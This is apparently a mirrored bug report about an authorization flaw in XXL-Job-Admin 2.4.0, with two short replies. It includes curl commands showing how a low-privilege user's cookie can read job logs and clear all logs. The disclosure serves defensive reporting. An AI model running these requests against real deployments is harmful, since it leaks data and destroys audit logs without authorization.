Permission Vulnerability of Path /xxl-job-admin/joblog/clearLog & /xxl-job-admin/joblog/logDetailCat

gmol1639  于 4个月前  发布在  其他
关注(0)|答案(2)|浏览(288)

Environment

MySQL 5.7.44, XXL-Job-Admin 2.4.0
Virtual Machine 1: Ubuntu 22.04.3 (as XXL-Job-Admin)
Virtual Machine 2: Ubuntu 22.04.3 (as XXL-Job-Executor)

Vulnerability Information

It was found that the direct query of xxl-job-admin/joblog/clearLog and /xxl-job-admin/joblog/logDetailPage does not validate user privilege and induces risk of sensitive information leakage and loss.

Steps to reproduce the behavior

Step 1: Create a normal user without any privilege inside the web console as below

Step 2: Retrieve the cookie for the user

Step 3: Run the following command for testing log query
curl -v -X POST "http://<IP address:port>/xxl-job-admin/joblog/logDetailCat" --cookie "XXL_JOB_LOGIN_IDENTITY=<normal user cookie>" -d 'logId=9&fromLineNum=1'

It can show the successful log query and return 200 status.

Step 4: Run the following command for log clearing
curl -v -X POST "http://<IP address:port>/xxl-job-admin/joblog/clearLog" --cookie "XXL_JOB_LOGIN_IDENTITY=<normal user cookie>" -d 'jobGroup=0&jobId=0&type=9'

it will return 200 status.

Step 5. Show the log in the console. It will show that all log is cleared successfully by normal user.

aij0ehis

aij0ehis1#

Create an unprivileged user and get its cookie, which I don't think is easy for attackers.

yfwxisqw

yfwxisqw2#

Agree. The assumption of the attack is that you gained an unprivileged account.

相关问题